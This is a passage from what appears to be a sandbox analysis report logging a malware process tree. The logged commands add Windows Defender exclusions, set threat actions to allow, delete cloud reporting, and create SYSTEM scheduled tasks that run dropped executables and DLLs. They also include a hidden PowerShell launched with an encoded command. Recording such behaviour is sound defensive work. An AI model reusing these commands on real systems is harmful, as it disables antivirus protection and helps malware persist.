/t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wyDIDuFJfRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QRMFokDIujmzevVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QRMFokDIujmzevVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OooJbXkEBeoeLJsK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OooJbXkEBeoeLJsK\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:6516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ENXTzHitnHcZC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ENXTzHitnHcZC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpBrNwvlU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpBrNwvlU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsvZUvXLjTYU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsvZUvXLjTYU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wyDIDuFJfRUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wyDIDuFJfRUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QRMFokDIujmzevVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QRMFokDIujmzevVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:7428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OooJbXkEBeoeLJsK /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OooJbXkEBeoeLJsK /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gamkOanYX" /SC once /ST 00:09:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:6468
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gamkOanYX"
  2⤵
  PID:7588
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gamkOanYX"
  2⤵
  PID:8120
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iogxlojnWQRHhtvmX" /SC once /ST 02:03:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OooJbXkEBeoeLJsK\uUCCQbKVGggocfz\gQZwsGY.exe\" HU /XCsite_ideyb 525403 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:7736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "iogxlojnWQRHhtvmX"
  2⤵
  PID:7860

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:5440

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2900

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:7096

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7092

C:\Windows\Temp\OooJbXkEBeoeLJsK\uUCCQbKVGggocfz\gQZwsGY.exe
C:\Windows\Temp\OooJbXkEBeoeLJsK\uUCCQbKVGggocfz\gQZwsGY.exe HU /XCsite_ideyb 525403 /S
1⤵
PID:7424
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqsbAisQdgUfmAHwUf"
  2⤵
  PID:8144
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:4940
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:5456
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HpBrNwvlU\lQrZHT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mmNhukqexjZqfsW" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2788
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "mmNhukqexjZqfsW2" /F /xml "C:\Program Files (x86)\HpBrNwvlU\hGLfjcr.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4500
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "mmNhukqexjZqfsW"
  2⤵
  PID:5996
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "mmNhukqexjZqfsW"
  2⤵
  PID:7772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "oltpyUKOdAomWI" /F /xml "C:\Program Files (x86)\QsvZUvXLjTYU2\csMvDkj.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "tInLIYNnoIpMi2" /F /xml "C:\ProgramData\QRMFokDIujmzevVB\AXtEwsq.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4032
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "oLzZBYGpjfofjGIHE2" /F /xml "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR\dAlVDCk.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:8088
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XzlPVfCqFNqadWbIJzS2" /F /xml "C:\Program Files (x86)\ENXTzHitnHcZC\cwqxzax.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LhQlXqIfnavoTxUYk" /SC once /ST 02:02:04 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\OooJbXkEBeoeLJsK\eiRUyuPj\EpNJRgJ.dll\",#1 /jAsite_idfRe 525403" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:6416
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "LhQlXqIfnavoTxUYk"
  2⤵
  PID:7880
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WjLCI1" /SC once /ST 02:38:39 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
  2⤵
  - Creates scheduled task(s)
  PID:7408
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "WjLCI1"
  2⤵
  PID:7100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "WjLCI1"
  2⤵
  PID:8044
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:6440
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:7768
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:7548
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:5180
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "iogxlojnWQRHhtvmX"
  2⤵
  PID:1264

C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\uUCCQbKVGggocfz\FpVOHLN.exe
C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\uUCCQbKVGggocfz\FpVOHLN.exe HU /oUsite_idyub 525403 /S
1⤵
PID:6068
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqsbAisQdgUfmAHwUf"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4004
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:5096
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:6516
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:7176
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5736
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HpBrNwvlU\vmxQGS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "mmNhukqexjZqfsW" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5440

C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\BctMiEHyZykyFyQ\DPKYGBK.exe
C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\BctMiEHyZykyFyQ\DPKYGBK.exe kt /zFsite_idfSO 385118 /S
1⤵
PID:7956
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6184
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2624
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8472
- - C:\Windows\SysWOW64\reg.exe
